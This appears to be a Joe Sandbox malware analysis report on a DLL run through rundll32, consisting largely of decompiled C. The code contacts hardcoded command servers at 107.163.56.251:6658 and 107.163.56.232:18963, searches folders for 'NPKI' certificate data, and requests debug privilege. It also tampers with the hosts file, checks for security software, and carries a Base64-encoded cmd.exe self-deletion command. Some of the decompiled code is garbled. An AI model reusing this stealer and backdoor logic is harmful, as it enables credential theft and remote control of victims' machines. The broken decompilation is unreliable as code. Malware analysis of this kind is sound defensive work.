				intOrPtr* _t149;
				int _t150;
				intOrPtr* _t151;
				void* _t153;
				void* _t155;
				void* _t163;
				void* _t165;

				_t165 = __fp0;
				_t151 = __esi;
				_t138 = __edx;
				_t112 = __ebx;
				_push("\\");
				_push(_t153 - 0x398);
				 *__esi();
				_push("*.*");
				_push(_t153 - 0x398);
				 *__esi();
				_t62 = E1002912D(__ebx, __esi, _t153 - 0x398, _t153 - 0x398, _t153 - 0x4d8); // executed
				 *((intOrPtr*)(_t153 - 4)) = _t62;
				if(_t62 != 0xffffffff) {
					L2:
					_t63 = _t153 - 0x4d8;
					0x10036154(_t138,  *((intOrPtr*)(_t153 - 4)), _t63); // executed
					__eflags = _t63;
					if(__eflags != 0) {
						__eflags =  *((char*)(_t153 - 0x4ac)) - 0x2e;
						if( *((char*)(_t153 - 0x4ac)) != 0x2e) {
							__eflags =  *(_t153 - 0x4d8) & 0x00000010;
							if(( *(_t153 - 0x4d8) & 0x00000010) != 0) {
								__eflags = 0;
								_t115 = 0x40;
								_t140 = _t153 - 0x293;
								 *((char*)(_t153 - 0x294)) = _t112;
								memset(_t140, 0, _t115 << 2);
								_t155 = _t155 + 0xc;
								_t141 = _t140 + _t115;
								asm("stosw");
								asm("stosb");
								0x10036c11(_t153 - 0x294,  *((intOrPtr*)(_t153 + 8)));
								_t67 = _t140 + _t115 - 0x294;
								asm("invalid");
								_push("\\");
								_pop(_t117);
								 *_t67 =  *_t67 + _t138;
								 *_t151(_t67);
								 *_t151(_t153 - 0x294, _t153 - 0x4ac);
								_t72 = _t153 - 0x4ac;
								_push(_t72);
								_push("NPKI");
								_push(_t72);
								_t73 = E100254F0(_t112, _t117, _t138, _t141, _t151);
								__eflags = _t73;
								if(_t73 != 0) {
									L10007F4F(_t138, _t165, _t153 - 0x294); // executed
								} else {
									_t121 = 0x3f;
									 *((char*)(_t153 - 0x5d8)) = _t112;
									memset(_t153 - 0x5d7, _t73, _t121 << 2);
									asm("stosw");
									asm("stosb");
									_push("12071239");
									E10003EF4(_t153 - 0x5d8, "%s\\%s", _t153 - 0x294);
									_push(_t153 - 0x5d8);
									 *((intOrPtr*)(E10022125(_t153 - 0x5d8, _t112, 0, _t138, _t151, _t165) - 0xbfffffff)) =  *((intOrPtr*)(E10022125(_t153 - 0x5d8, _t112, 0, _t138, _t151, _t165) - 0xbfffffff)) + E10022125(_t153 - 0x5d8, _t112, 0, _t138, _t151, _t165) - 0xbfffffff;
									_t83 =  *0x8e85700;
									 *_t83 =  *_t83 + _t83;
									 *((intOrPtr*)(_t153 - 0x10)) = _t83;
									_t85 = E10004770(_t153 - 0x294, 0x850fc085, _t138, _t153 - 0x5d7 + _t121, _t165, _t153 - 0x294, _t83, _t153 - 0x5d7 + _t121);
									_push(0x1f);
									 *((intOrPtr*)(_t153 - 0xc)) = _t85;
									 *((char*)(_t153 - 0x90)) = _t112;
									memset(_t153 - 0x8f, 0, 0x850fc085 << 2);
									asm("stosw");
									asm("stosb");
									_push(0x1f);
									 *((char*)(_t153 - 0x190)) = _t112;
									memset(_t153 - 0x18f, 0, 0 << 2);
									asm("stosw");
									asm("stosb");
									_t128 = 0x1f;
									_t148 = _t153 - 0x10f;
									 *((char*)(_t153 - 0x110)) = _t112;
									memset(_t148, 0, 0 << 2);
									_t149 = _t148 + _t128;
									asm("stosw");
									asm("stosb");
									 *((intOrPtr*)(_t153 - 8)) = 0x50;
									_t93 = E10005C4C(_t153 - 0x110, 0x80);
									_t163 = _t155 + 0x1c - 1 + 0x3c;
									__eflags = _t93;
									if(_t93 == 0) {
										_push( &M1001258F);
									} else {
										_push(_t153 - 0x109);
									}
									E1000CD0E(0, _t153 - 0x90);
									0x1003775b();
									_t98 =  *_t149(_t153 - 0x90, 0x2f);
									__eflags = _t98;
									if(_t98 != 0) {
										 *( *_t149(_t153 - 0x90, 0x2f)) = _t112;
									}
									_t150 =  *_t149(_t153 - 0x90, 0x3a);
									__eflags = _t150 - _t112;
									_pop(_t134);
									if(__eflags != 0) {
										 *_t150 = _t112;
										_t108 = E1000CD0E(_t134, _t153 - 0x190);
										_t150 = _t150 + 1;
										__eflags = _t150;
										0x100354a4(_t138, _t150, _t153 - 0x90);
										_t163 = _t163 + 0xc;
										 *((intOrPtr*)(_t153 - 8)) = _t108;
									}
									_push( *((intOrPtr*)(_t153 - 0xc)));
									_push( *((intOrPtr*)(_t153 - 0x10)));
									_push( *((intOrPtr*)(_t153 - 8)));
									_t101 = E10001000(_t134, __eflags, _t165, "L2ltYWdlLnBocA==");
									_pop(_t135);
									_push(_t101);
									_push(_t153 - 0x190);
									_t103 = E10007E03(_t112, _t135, _t150, _t151, __eflags, _t165);
									_t155 = _t163 + 0x14;
									__eflags = _t103;
									if(__eflags != 0) {
										_push(_t112);
										_push(_t153 - 0x5d8);
										E1002E0E4(_t135, _t138, _t150, _t151, __eflags);
										_pop(es);
									}
									 *0x10017b90 = 1;
									Sleep(0xbb8);
								}
							}
						}
						goto L2;
					}
					0x10040814( *((intOrPtr*)(_t153 - 4)));
					if(__eflags == 0) {
						asm("adc [edi+0x5e], bl");
					}
					goto L20;
				} else {
					_t63 = 0;
					L20:
					return _t63;
				}
			}

0x10007f89
0x10007f89
0x10007f89
0x10007f89
0x10007f8f
0x10007f94
0x10007f95
0x10007f9d
0x10007fa2
0x10007fa3
0x10007fb4
0x10007fbc
0x10007fbf
0x10007fc8
0x10007fc8
0x10007fd3
0x10007fd8
0x10007fda
0x10007fe0
0x10007fe7
0x10007fe9
0x10007ff0
0x10007ff4
0x10007ff6
0x10007ff7
0x10007ffd
0x10008006
0x10008006
0x10008006
0x10008008
0x1000800a
0x10008012
0x10008017
0x1000801c
0x1000801e
0x10008020
0x10008021
0x10008024
0x10008034
0x10008036
0x1000803c
0x1000803d
0x10008042
0x10008043
0x10008049
0x1000804c
0x100081ea
0x10008052
0x1000805a
0x1000805b
0x10008061
0x10008063
0x10008065
0x1000806c
0x1000807e
0x1000808c
0x1000809c
0x1000809e
0x100080a4
0x100080a7
0x100080b2
0x100080b7
0x100080b9
0x100080c5
0x100080cb
0x100080cd
0x100080cf
0x100080d0
0x100080db
0x100080e3
0x100080e5
0x100080e7
0x100080e8
0x100080eb
0x100080f1
0x100080f7
0x100080f7
0x100080f9
0x100080fb
0x10008108
0x1000810f
0x10008114
0x10008117
0x10008119
0x10008124
0x1000811b
0x10008121
0x10008121
0x10008130
0x10008135
0x10008146
0x10008149
0x1000814c
0x1000815a
0x1000815c
0x10008168
0x1000816b
0x1000816d
0x1000816e
0x10008176
0x10008180
0x10008185
0x10008185
0x10008188
0x1000818d
0x10008190
0x10008190
0x10008193
0x10008196
0x10008199
0x100081a1
0x100081a6
0x100081a7
0x100081ae
0x100081af
0x100081b4
0x100081b7
0x100081b9
0x100081c1
0x100081c2
0x100081c3
0x100081c8
0x100081c8
0x100081ce
0x100081d8
0x100081d8
0x1000804c
0x10007ff0
0x00000000
0x10007fe7
0x100081f8
0x10008200
0x10008202
0x10008202
0x00000000
0x10007fc1
0x10007fc1
0x10008203
0x10008207
0x10008207

Strings

., xrefs: 10007FE0
*.*, xrefs: 10007F9D

Memory Dump Source

Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID: *.*$.
API String ID: 0-358234090
Opcode ID: 1e842e5c8c1ad58366fa87f5798196a6fd66006b81a13b24c003e61169ad0fa4
Instruction ID: bf8cbc250889b9ba669e23c0522c0e0e43b025ab8836cd358959c2a0f0221b08
Opcode Fuzzy Hash: 1e842e5c8c1ad58366fa87f5798196a6fd66006b81a13b24c003e61169ad0fa4
Instruction Fuzzy Hash: C91161B2D0029DBEEF52D7A0DD44ADD7BBCEF45291F1004E6E648E6081DA749B889F60

Uniqueness

Uniqueness Score: -1.00%

Function 10003FB7 Relevance: 1.5, APIs: 1, Instructions: 4
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10003FB7(int _a4, int _a8) {
				void* _t3;

				_t3 = CreateToolhelp32Snapshot(_a4, _a8); // executed
				return _t3;
			}

0x10003fbf
0x10003fc5

APIs

CreateToolhelp32Snapshot.KERNEL32(00000000,00000000), ref: 10003FBF

Memory Dump Source

Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: CreateSnapshotToolhelp32
String ID:
API String ID: 3332741929-0
Opcode ID: 52575d3eb3ab59922be1ab4602cb830e029d55bacf89bd0c0cdd206a51f88f2f
Instruction ID: 92745056c523567f199991dad2fb0d4ab4f903fb5d7c64995becaa4a73b6ff46
Opcode Fuzzy Hash: 52575d3eb3ab59922be1ab4602cb830e029d55bacf89bd0c0cdd206a51f88f2f
Instruction Fuzzy Hash: 69A00235404251ABDA415B50CD44D5ABF61BB94741F05C415F19541034C73195A5DB11

Uniqueness

Uniqueness Score: -1.00%

Function 100042A2 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5ebeb73645924bb769e814257880a44120a8cafd9d08b24bc9cd62ec592b88f
Instruction ID: 9392647056415430420877d8d55925c7b4ca55eea7d1033a0f72c8ceea97fbde
Opcode Fuzzy Hash: b5ebeb73645924bb769e814257880a44120a8cafd9d08b24bc9cd62ec592b88f
Instruction Fuzzy Hash: FA014BB9D11219BEDF11EFA4CC46EEFBBBCEF08250F504421B904E6141E6B4AB018BE0

Uniqueness

Uniqueness Score: -1.00%

Function 10008656 Relevance: 47.5, APIs: 20, Strings: 7, Instructions: 224
threadsleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 48%

			E10008656(void* __ecx, void* __edx, void* __esi, void* __eflags, void* __fp0, signed int _a12) {
				void* _v19;
				char _v20;
				void _v1043;
				char _v1044;
				char _v1444;
				void* _v1452;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t15;
				CHAR* _t18;
				signed int _t22;
				void* _t24;
				void* _t31;
				intOrPtr* _t39;
				void* _t40;
				void* _t43;
				void* _t48;
				void* _t52;
				void* _t53;
				void* _t56;
				void* _t59;
				intOrPtr _t64;
				void* _t66;

				_t79 = __fp0;
				_t63 = __esi;
				_t55 = __edx;
				_t15 = E10005989(_t43, __ecx, __edx, _t56, __esi, _t66, __eflags, __fp0);
				0x100337e0(0, 1, "M107.163.56.251:6658", 0x10015a68);
				asm("daa");
				0x1003b59a(_t66);
				if(_t15 != 0xb7) {
					_t72 = _t15 - 5;
					if(_t15 != 5) {
						E100042A2(0, _t72, __fp0, "SeDebugPrivilege", 1); // executed
						_t24 = E10005986();
						_t59 = "C:\\Users\\alfons\\Desktop\\12071239";
						0x1004075a(_t59, __esi);
						_t64 =  *0x1000e094;
						if(_t24 == 0) {
							_t39 = E100044AD(_t24, __edx, 0x35); // executed
							_pop(_t53);
							if(_t39 != 0xffffffff) {
								_t39 = E10004351(_t39, _t53, __edx, __fp0, _t39, "123");
								_pop(_t53);
							}
							0x10030e70(0);
							_t66 = _t59;
							asm("adc [esp+edx+0x68], dh");
							asm("rol byte [edi], 1");
							 *_t39 =  *_t39 + _t39; // executed
							Sleep(??); // executed
							_push(_a12);
							_t40 = L1002E51E(_t39, _t53, _t66);
							asm("repe call 0xffffbd83");
							_t76 = _t40;
							if(_t40 == 0) {
								CreateThread(0, 0, E10008578, 0, 0, 0); // executed
							}
							E10006DD5(0, _t53, _t55, _t59, _t64, _t76, _t79); // executed
						}
						CreateThread(0, 0, E10006EE7, 0, 0, 0); // executed
						Sleep(0x3e8); // executed
						0x10033977(0x202,  &_v1444);
						CreateThread(0, 0, E10006B30, "107.163.56.251:6658", 0, 0); // executed
						CreateThread(0, 0, E10008208, 0, 0, 0); // executed
						Sleep(0xbb8); // executed
						_v20 = 0;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosw");
						asm("stosb");
						_t31 = E10005ACA(_t76,  &_v20);
						_t77 = _t31 - 5;
						_t52 = _t66;
						if(_t31 < 5) {
							CreateThread(0, 0, E10007112, 0, 0, 0); // executed
						}
						CreateThread(0, 0, E1000827D, 0, 0, 0); // executed
						Sleep(0xbb8); // executed
						CreateThread(0, 0, E1000490F, 0, 0, 0); // executed
						CreateThread(0, 0, E10006EEF, 0, 0, 0); // executed
						if(E10004482(_t52, _t77, _t79) == 0) {
							Sleep(0x927c0); // executed
							CreateThread(0, 0, 0x10006a7f, 0, 0, 0); // executed
							Sleep(0x1388); // executed
							CreateThread(0, 0, E1000842D, 0, 0, 0); // executed
						}
						Sleep(0xffffffff); // executed
						L13:
						Sleep(0x36ee80);
						goto L13;
					}
				}
				_v1044 = 0;
				memset( &_v1043, 0, 0xff << 2);
				asm("stosw");
				_push("C:\\Users\\alfons\\Desktop");
				asm("stosb");
				_t18 = E10001000(0, __eflags, _t79, "Y21kLmV4ZSAvYyBwaW5nIDEyNy4wLjAuMSAtbiAzJnJkIC9zIC9xICIlcyI=");
				_pop(_t48);
				wsprintfA( &_v1044, _t18);
				_push(0);
				_t22 = E100255A5(0, _t48,  &_v1043 + 0xff, _t63, _t66, _t55,  &_v1044);
				__eflags = _a12;
				if(_a12 != 0) {
					Sleep(0x7d0);
					0x10041059(_a12);
					__eflags = _t22 & 0xc3c95b5f;
					return _t22;
				}
				return _t22;
			}

0x10008656
0x10008656
0x10008656
0x10008661
0x1000867b
0x10008680
0x10008682
0x1000868c
0x10008692
0x10008695
0x100086a3
0x100086aa
0x100086af
0x100086b5
0x100086bb
0x100086c3
0x100086c7
0x100086cf
0x100086d0
0x100086d8
0x100086de
0x100086de
0x100086e1
0x100086e8
0x100086e9
0x100086ed
0x100086ef
0x100086f1
0x100086f7
0x100086fa
0x100086ff
0x10008705
0x10008707
0x10008713
0x10008713
0x10008715
0x10008715
0x10008724
0x10008731
0x10008740
0x10008753
0x1000875f
0x10008766
0x1000876d
0x10008770
0x10008771
0x10008772
0x10008773
0x10008775
0x1000877a
0x1000877f
0x10008782
0x10008783
0x1000878f
0x1000878f
0x1000879b
0x100087a8
0x100087b4
0x100087c0
0x100087cf
0x100087d6
0x100087e2
0x100087e9
0x100087f5
0x100087f5
0x100087f9
0x100087fc
0x10008801
0x00000000
0x10008801
0x10008695
0x10008812
0x10008818
0x1000881a
0x1000881c
0x10008826
0x10008827
0x1000882c
0x10008835
0x10008844
0x10008847
0x1000884c
0x1000884f
0x10008856
0x1000885f
0x10008864
0x00000000
0x10008864
0x10008868

APIs

Part of subcall function 10005989: wsprintfA.USER32 ref: 100059AE
Part of subcall function 10005989: wsprintfA.USER32 ref: 100059FB
Part of subcall function 10005989: wsprintfA.USER32 ref: 10005A08
Part of subcall function 10005989: wsprintfA.USER32 ref: 10005A19

Sleep.KERNEL32(00000000,C:\Users\user\Desktop\12071239,?,?,00000000,00000001,M107.163.56.251:6658,10015A68), ref: 100086F1
CreateThread.KERNEL32(00000000,00000000,10008578,00000000,00000000,00000000), ref: 10008713
CreateThread.KERNEL32(00000000,00000000,10006EE7,00000000,00000000,00000000), ref: 10008724
Sleep.KERNEL32(000003E8,?,?,00000000,00000001,M107.163.56.251:6658,10015A68), ref: 10008731
CreateThread.KERNEL32(00000000,00000000,10006B30,107.163.56.251:6658,00000000,00000000), ref: 10008753
CreateThread.KERNEL32(00000000,00000000,10008208,00000000,00000000,00000000), ref: 1000875F
Sleep.KERNEL32(00000BB8,?,00000202,?,?,?,00000000,00000001,M107.163.56.251:6658,10015A68), ref: 10008766
CreateThread.KERNEL32(00000000,00000000,10007112,00000000,00000000,00000000), ref: 1000878F
CreateThread.KERNEL32(00000000,00000000,1000827D,00000000,00000000,00000000), ref: 1000879B
Sleep.KERNEL32(00000BB8,?,00000202,?,?,?,00000000,00000001,M107.163.56.251:6658,10015A68), ref: 100087A8
CreateThread.KERNEL32(00000000,00000000,1000490F,00000000,00000000,00000000), ref: 100087B4
CreateThread.KERNEL32(00000000,00000000,10006EEF,00000000,00000000,00000000), ref: 100087C0
Sleep.KERNEL32(000927C0,?,00000202,?,?,?,00000000,00000001,M107.163.56.251:6658,10015A68), ref: 100087D6
CreateThread.KERNEL32(00000000,00000000,10006A7F,00000000,00000000,00000000), ref: 100087E2
Sleep.KERNEL32(00001388,?,00000202,?,?,?,00000000,00000001,M107.163.56.251:6658,10015A68), ref: 100087E9

Part of subcall function 100044AD: GetExtendedUdpTable.IPHLPAPI(00000000,?,00000001,00000002,00000001,00000000,?,00000000,iphlpapi.dll,C:\Users\user\Desktop\12071239,751443E0,00000000), ref: 100044E9

CreateThread.KERNEL32(00000000,00000000,1000842D,00000000,00000000,00000000), ref: 100087F5
Sleep.KERNEL32(000000FF,?,00000202,?,?,?,00000000,00000001,M107.163.56.251:6658,10015A68), ref: 100087F9
Sleep.KERNEL32(0036EE80,00000202,?,?,?,00000000,00000001,M107.163.56.251:6658,10015A68), ref: 10008801
wsprintfA.USER32 ref: 10008835
Sleep.KERNEL32(000007D0,?,?,00000000), ref: 10008856

Strings

123, xrefs: 100086D2
C:\Users\user\Desktop, xrefs: 1000881C
107.163.56.251:6658, xrefs: 10008747
SeDebugPrivilege, xrefs: 1000869E
Y21kLmV4ZSAvYyBwaW5nIDEyNy4wLjAuMSAtbiAzJnJkIC9zIC9xICIlcyI=, xrefs: 10008821
M107.163.56.251:6658, xrefs: 10008671
C:\Users\user\Desktop\12071239, xrefs: 100086AF, 100086B4, 100086E0, 1000873F

Memory Dump Source

Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: CreateThread$Sleep$wsprintf$ExtendedTable
String ID: 107.163.56.251:6658$123$C:\Users\user\Desktop$C:\Users\user\Desktop\12071239$M107.163.56.251:6658$SeDebugPrivilege$Y21kLmV4ZSAvYyBwaW5nIDEyNy4wLjAuMSAtbiAzJnJkIC9zIC9xICIlcyI=
API String ID: 2017569163-3242930679
Opcode ID: 5eddfbfb2886de8fa0f4fbffde14f3620d22a276abf96e1261f835aff45dc5ad
Instruction ID: 562cb21c62d1d749736fc9fe061952e86694a01f598b035fd930608b54173050
Opcode Fuzzy Hash: 5eddfbfb2886de8fa0f4fbffde14f3620d22a276abf96e1261f835aff45dc5ad
Instruction Fuzzy Hash: 8B51BEE150435CBEF710E7788CC5EBB3A9CEF442D9F11092AF255A508ADFB4AD408A76

Uniqueness

Uniqueness Score: -1.00%

Function 10006EEF Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 174
sleepfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 46%

			E10006EEF() {
				signed int _v8;
				void _v267;
				signed char _v268;
				void _v527;
				signed char _v528;
				void _v783;
				signed char _v784;
				void _v1807;
				signed char _v1808;
				void _v5903;
				signed char _v5904;
				void* _t47;
				void* _t48;
				void* _t49;
				void* _t53;
				void* _t65;
				signed int _t71;
				signed int _t76;
				signed int _t90;
				void* _t94;
				void* _t95;
				void* _t96;
				signed int _t100;
				void* _t102;
				void* _t109;
				signed int _t110;
				void* _t117;
				void* _t118;
				signed int _t130;
				intOrPtr* _t132;
				void* _t134;
				char** _t135;
				char** _t138;
				char** _t140;
				void* _t143;
				void* _t146;

				E1000CD20(0x170c, _t96);
				_push(_t94);
				_t132 = E10001000(_t96, _t143, _t146, "QVNEU3ZjLmV4ZQ==");
				 *_t135 = "QVlSVFNydi5heWU="; // executed
				_t47 = E10001000(_t96, _t143, _t146, _t117); // executed
				_t118 = _t47;
				while(1) {
					_t48 = E1000591C(_t132); // executed
					if(_t48 != 0) {
						goto L3;
					}
					_t49 = E1000591C(_t118); // executed
					if(_t49 == 0) {
						_v268 = _v268 & 0x00000000;
						_t100 = 0x40;
						_v528 = _v528 & 0x00000000;
						memset( &_v267, 0, _t100 << 2);
						asm("stosw");
						asm("stosb");
						__eflags = 0;
						_t102 = 0x40;
						_t53 = memset( &_v527, 0, 0 << 2);
						asm("stosw");
						E100268BC(_t53,  &_v527 + _t102);
						asm("stosb");
						 *_t132( &_v268, 0x104, _t53);
						 *_t132( &_v528, 0x104);
						_push(E10001000(0, __eflags, _t146, "XGRyaXZlcnNcZXRjXGhvc3Rz"));
						E1000CD08(0,  &_v268);
						_push(E10001000(0, __eflags, _t146, "XGRyaXZlcnNcZXRjXGhvc3RzLmljcw=="));
						_t65 = E1000CCAE(E1000CD08(0,  &_v528), _t94, 0, _t116, 0x104, 0x80000, _t134, __eflags, _t146, 0x80000); // executed
						_t138 =  &(_t135[0xd]);
						_t95 = _t65;
						while(1) {
							_v1808 = _v1808 & 0x00000000;
							memset( &_v1807, 0, 0xff << 2);
							_v784 = _v784 & 0x00000000;
							asm("stosw");
							asm("stosb");
							memset( &_v783, 0, 0 << 2);
							_t140 =  &(_t138[6]);
							asm("stosw");
							asm("stosb");
							_t71 = E10005C4C( &_v784, 0x100); // executed
							__eflags = _t71;
							_t109 = 0x3f;
							if(__eflags == 0) {
								_push("http://107.163.56.232:18963/main.php");
							} else {
								_push( &_v784);
							}
							_push("%s");
							_push( &_v1808);
							E10003EF4();
							_push(0x80000);
							_push(0);
							E1000CCFC(_t95, _t109, 0x80000, _t134, __eflags, _t95);
							_t76 = E100061BD(_t109, 0x80000, __eflags, _t146,  &_v1808, _t95, 0x80000); // executed
							_t138 =  &(_t140[9]);
							__eflags = _t76 - 7;
							_v8 = _t76;
							if(__eflags > 0) {
								goto L11;
							}
							_push("iOffset");
							_push("c:\\1.txt"); // executed
							L10004139(_t109, _t116, __eflags, _t146); // executed
							L10:
							Sleep( *0x10012500); // executed
							continue;
							L11:
							_t110 = 0;
							__eflags = _t76;
							if(_t76 <= 0) {
								L16:
								_push(_t95);
								__eflags = E1000CD02(_t110, 0x80000) - 0x10;
								if(__eflags <= 0) {
									wsprintfA(0x10016ae0, "%s", _t95);
									_v5904 = _v5904 & 0x00000000;
									memset( &_v5903, 0, 0x3ff << 2);
									asm("stosw");
									asm("stosb");
									E10005318(0, __eflags,  &_v5904);
									E1000443D( &_v5904, _t95, 0, _t116,  &_v5904,  &_v268);
									E1000443D( &_v5904, _t95, 0, _t116,  &_v5904,  &_v528);
									_push(_t95);
									_push(0x10016ae0);
									E1000CDF2(0x80000);
									_t138 =  &(_t138[0xd]);
								}
								goto L10;
							} else {
								goto L12;
							}
							do {
								L12:
								_t90 = _t110;
								asm("cdq");
								_t130 = 2;
								_t116 = _t90 % _t130;
								__eflags = _t90 % _t130;
								if(_t90 % _t130 == 0) {
									_t32 = _t110 + _t95;
									 *_t32 =  *(_t110 + _t95) + 0x4b;
									__eflags =  *_t32;
								} else {
									 *(_t110 + _t95) =  *(_t110 + _t95) + 0x3a;
								}
								_t110 = _t110 + 1;
								__eflags = _t110 - _v8;
							} while (_t110 < _v8);
							goto L16;
						}
					}
					L3:
					Sleep(0xea60);
				}
			}

0x10006ef7
0x10006efc
0x10006f09
0x10006f0b
0x10006f12
0x10006f18
0x10006f1a
0x10006f1b
0x10006f23
0x00000000
0x00000000
0x10006f26
0x10006f2e
0x10006f3d
0x10006f46
0x10006f4f
0x10006f56
0x10006f58
0x10006f5a
0x10006f5d
0x10006f5f
0x10006f66
0x10006f68
0x10006f6b
0x10006f70
0x10006f7e
0x10006f88
0x10006f94
0x10006f9c
0x10006fab
0x10006fbe
0x10006fc3
0x10006fc6
0x10006fc8
0x10006fc8
0x10006fdc
0x10006fde
0x10006fe7
0x10006fe9
0x10006ff8
0x10006ff8
0x10006ffa
0x10006ffc
0x10007004
0x1000700a
0x1000700c
0x1000700d
0x10007018
0x1000700f
0x10007015
0x10007015
0x10007023
0x10007028
0x10007029
0x10007031
0x10007032
0x10007035
0x10007043
0x10007048
0x1000704b
0x1000704e
0x10007051
0x00000000
0x00000000
0x10007053
0x10007058
0x1000705d
0x10007064
0x1000706a
0x00000000
0x10007075
0x10007075
0x10007077
0x10007079
0x10007097
0x10007097
0x1000709d
0x100070a1
0x100070ae
0x100070b4
0x100070c8
0x100070ca
0x100070cc
0x100070d4
0x100070e7
0x100070fa
0x100070ff
0x10007100
0x10007105
0x1000710a
0x1000710a
0x00000000
0x00000000
0x00000000
0x00000000
0x1000707b
0x1000707b
0x1000707b
0x1000707f
0x10007080
0x10007081
0x10007083
0x10007085
0x1000708d
0x1000708d
0x1000708d
0x10007087
0x10007087
0x10007087
0x10007091
0x10007092
0x10007092
0x00000000
0x1000707b
0x10006fc8
0x10006f30
0x10006f35
0x10006f35

APIs

Sleep.KERNEL32(0000EA60), ref: 10006F35
Sleep.KERNEL32 ref: 1000706A
wsprintfA.USER32 ref: 100070AE
PrintFile.ABC(00000000,?,00000000), ref: 100070E7
PrintFile.ABC(00000000,?,00000000,?,00000000), ref: 100070FA

Strings

XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==, xrefs: 10006FA1
http://107.163.56.232:18963/main.php, xrefs: 10007018
QVlSVFNydi5heWU=, xrefs: 10006F0B
iOffset, xrefs: 10007053
XGRyaXZlcnNcZXRjXGhvc3Rz, xrefs: 10006F8A
QVNEU3ZjLmV4ZQ==, xrefs: 10006EFF
c:\1.txt, xrefs: 10007058

Memory Dump Source

Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: FilePrintSleep$wsprintf
String ID: QVNEU3ZjLmV4ZQ==$QVlSVFNydi5heWU=$XGRyaXZlcnNcZXRjXGhvc3Rz$XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==$c:\1.txt$http://107.163.56.232:18963/main.php$iOffset
API String ID: 1547040302-1685166179
Opcode ID: 98aa69a6f984e71f9bd2625cd89ddf0c92c8ddd1c0c6d5115167c38e8364c081
Instruction ID: 3d380b1aca1ede5b104bd14f8e69b562dc8f53a9395fdf47d07c0f5b95106c5e
Opcode Fuzzy Hash: 98aa69a6f984e71f9bd2625cd89ddf0c92c8ddd1c0c6d5115167c38e8364c081
Instruction Fuzzy Hash: 2651C8B6D04359AAFB21D774CC45FCF77ACEF08381F2045A6F208E6086DA75AB848E55

Uniqueness

Uniqueness Score: -1.00%

Function 10006499 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 321
timeCOMMON

Download Yara Rule

